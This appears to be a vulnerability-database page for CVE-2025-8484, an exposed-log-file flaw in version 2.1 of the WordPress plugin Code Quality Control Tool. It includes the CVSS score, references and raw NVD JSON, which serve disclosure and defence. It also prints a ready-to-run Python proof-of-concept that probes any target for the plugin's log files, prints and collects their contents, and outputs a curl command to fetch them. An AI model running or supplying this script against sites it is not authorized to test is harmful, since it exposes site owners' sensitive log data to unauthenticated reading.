CVE-2025-8484

Description

The Code Quality Control Tool plugin for WordPress is vulnerable to Sensitive Information Exposure in version 2.1 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Code Quality Control Tool 2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-8484 - WordPress Code Quality Control Tool Sensitive Information Exposure PoC
# This PoC demonstrates how to access publicly exposed log files

import requests
import sys

def exploit(target_url):
    """
    Exploit for CVE-2025-8484
    Targets publicly exposed log files in Code Quality Control Tool plugin v2.1
    """
    
    # Common log file paths in the plugin directory
    log_paths = [
        "/wp-content/plugins/code-quality-control-tool/error_log.txt",
        "/wp-content/plugins/code-quality-control-tool/error.log",
        "/wp-content/plugins/code-quality-control-tool/logs/error.log",
        "/wp-content/plugins/code-quality-control-tool/debug.log",
        "/wp-content/plugins/code-quality-control-tool/error_logger.log",
    ]
    
    print(f"[*] Targeting: {target_url}")
    print(f"[*] CVE-2025-8484 - Sensitive Information Exposure")
    print("-" * 60)
    
    found_files = []
    
    for path in log_paths:
        url = target_url.rstrip('/') + path
        try:
            response = requests.get(url, timeout=10, allow_redirects=False)
            
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[+] FOUND: {url}")
                print(f"    Status: {response.status_code}")
                print(f"    Size: {len(response.content)} bytes")
                
                # Display first 500 chars of log content
                content_preview = response.text[:500]
                print(f"    Preview:\n{content_preview}")
                print("-" * 60)
                
                found_files.append({
                    'url': url,
                    'size': len(response.content),
                    'content': response.text
                })
            elif response.status_code == 403:
                print(f"[-] Access Denied: {url}")
            else:
                print(f"[-] Not Found ({response.status_code}): {url}")
                
        except requests.exceptions.RequestException as e:
            print(f"[!] Error accessing {url}: {str(e)}")
    
    return found_files

def curl_exploit(target_url, log_path):
    """
    Simple curl-based exploitation
    Usage: curl -s http://target.com/wp-content/plugins/code-quality-control-tool/error_log.txt
    """
    full_url = target_url.rstrip('/') + log_path
    print(f"\n[*] Curl command to reproduce:")
    print(f"    curl -s '{full_url}'")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-8484.py <target_url>")
        print("Example: python3 cve-2025-8484.py https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    results = exploit(target)
    
    if results:
        print(f"\n[!] Vulnerability confirmed! Found {len(results)} exposed log file(s)")
        print("[!] Sensitive information may be exposed to unauthenticated attackers")
    else:
        print("\n[-] No exposed log files found or vulnerability has been patched")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-8484
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-8484
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-8484/
[4] VulDB https://vuldb.com/cve/CVE-2025-8484
[5] https://plugins.trac.wordpress.org/browser/code-quality-control-tool/trunk/error_logger.php#L71
[6] https://plugins.trac.wordpress.org/changeset/3385766/
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/b64635f4-abc0-4e69-89e4-357840c5e776?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-8484", "sourceIdentifier": "[email protected]", "published": "2025-10-11T10:15:43.987", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Code Quality Control Tool plugin for WordPress is vulnerable to Sensitive Information Exposure in version 2.1 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/code-quality-control-tool/trunk/error_logger.php#L71", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3385766/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b64635f4-abc0-4e69-89e4-357840c5e776?source=cve", "source": "[email protected]"}]}}